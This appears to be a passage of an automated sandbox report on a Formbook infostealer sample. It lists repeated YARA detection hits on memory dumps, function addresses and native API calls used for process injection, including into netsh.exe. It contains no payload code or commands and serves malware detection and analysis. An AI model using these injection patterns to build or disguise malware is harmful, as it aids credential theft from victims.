          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: cK1g5gckZR9VHjj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E5C240_2_008E5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_02B982500_2_02B98250
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_02B9D2F80_2_02B9D2F8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F5C241_2_002F5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BC782_2_0041BC78
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00408C7B2_2_00408C7B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00408C802_2_00408C80
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BD012_2_0041BD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BEE02_2_0041BEE0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041CFB62_2_0041CFB6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00565C242_2_00565C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010041202_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB0902_2_00FFB090
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A10022_2_010A1002
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A02_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B20A82_2_010B20A8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B28EC2_2_010B28EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEF9002_2_00FEF900
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2B282_2_010B2B28
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101EBB02_2_0101EBB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010ADBD22_2_010ADBD2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B22AE2_2_010B22AE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2D072_2_010B2D07
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1D552_2_010B1D55
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010125812_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B25DD2_2_010B25DD
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF841F2_2_00FF841F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFD5E02_2_00FFD5E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AD4662_2_010AD466
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE0D202_2_00FE0D20
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1FF12_2_010B1FF1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AD6162_2_010AD616
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01006E302_2_01006E30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2EF72_2_010B2EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388DBD212_2_0388DBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892B2812_2_03892B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FEBB012_2_037FEBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038922AE12_2_038922AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E412012_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CF90012_2_037CF900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038920A812_2_038920A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038928EC12_2_038928EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388100212_2_03881002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389E82412_2_0389E824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A012_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB09012_2_037DB090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891FF112_2_03891FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E6E3012_2_037E6E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892EF712_2_03892EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388D61612_2_0388D616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038925DD12_2_038925DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C0D2012_2_037C0D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892D0712_2_03892D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DD5E012_2_037DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891D5512_2_03891D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F258112_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D841F12_2_037D841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388D46612_2_0388D466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBEE012_2_02DDBEE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDCFB612_2_02DDCFB6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC2FB012_2_02DC2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC8C8012_2_02DC8C80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBC7812_2_02DDBC78
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC8C7B12_2_02DC8C7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC2D9012_2_02DC2D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBD0112_2_02DDBD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: String function: 00FEB150 appears 35 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037CB150 appears 35 times
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004185E0 NtCreateFile,2_2_004185E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00418690 NtReadFile,2_2_00418690
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00418710 NtClose,2_2_00418710
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004187C0 NtAllocateVirtualMemory,2_2_004187C0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004185DA NtCreateFile,2_2_004185DA
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041870C NtReadFile,NtClose,2_2_0041870C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004187BA NtAllocateVirtualMemory,2_2_004187BA
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01029910
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010299A0 NtCreateSection,LdrInitializeThunk,2_2_010299A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029840 NtDelayExecution,LdrInitializeThunk,2_2_01029840
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01029860
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_010298F0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01029A00
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A20 NtResumeThread,LdrInitializeThunk,2_2_01029A20
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A50 NtCreateFile,LdrInitializeThunk,2_2_01029A50
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029540 NtReadFile,LdrInitializeThunk,2_2_01029540
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010295D0 NtClose,LdrInitializeThunk,2_2_010295D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029710 NtQueryInformationToken,LdrInitializeThunk,2_2_01029710
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029780 NtMapViewOfSection,LdrInitializeThunk,2_2_01029780
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_010297A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029FE0 NtCreateMutant,LdrInitializeThunk,2_2_01029FE0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01029660
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_010296E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029950 NtQueueApcThread,2_2_01029950
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010299D0 NtCreateProcessEx,2_2_010299D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029820 NtEnumerateKey,2_2_01029820
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102B040 NtSuspendThread,2_2_0102B040
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010298A0 NtWriteVirtualMemory,2_2_010298A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029B00 NtSetValueKey,2_2_01029B00
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102A3B0 NtGetContextThread,2_2_0102A3B0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A10 NtQuerySection,2_2_01029A10
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A80 NtOpenDirectoryObject,2_2_01029A80
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029520 NtWaitForSingleObject,2_2_01029520
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102AD30 NtSetContextThread,2_2_0102AD30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029560 NtWriteFile,2_2_01029560
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010295F0 NtQueryInformationFile,2_2_010295F0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102A710 NtOpenProcessToken,2_2_0102A710
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029730 NtQueryVirtualMemory,2_2_01029730
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029760 NtOpenProcess,2_2_01029760
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102A770 NtOpenThread,2_2_0102A770
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029770 NtSetInformationFile,2_2_01029770
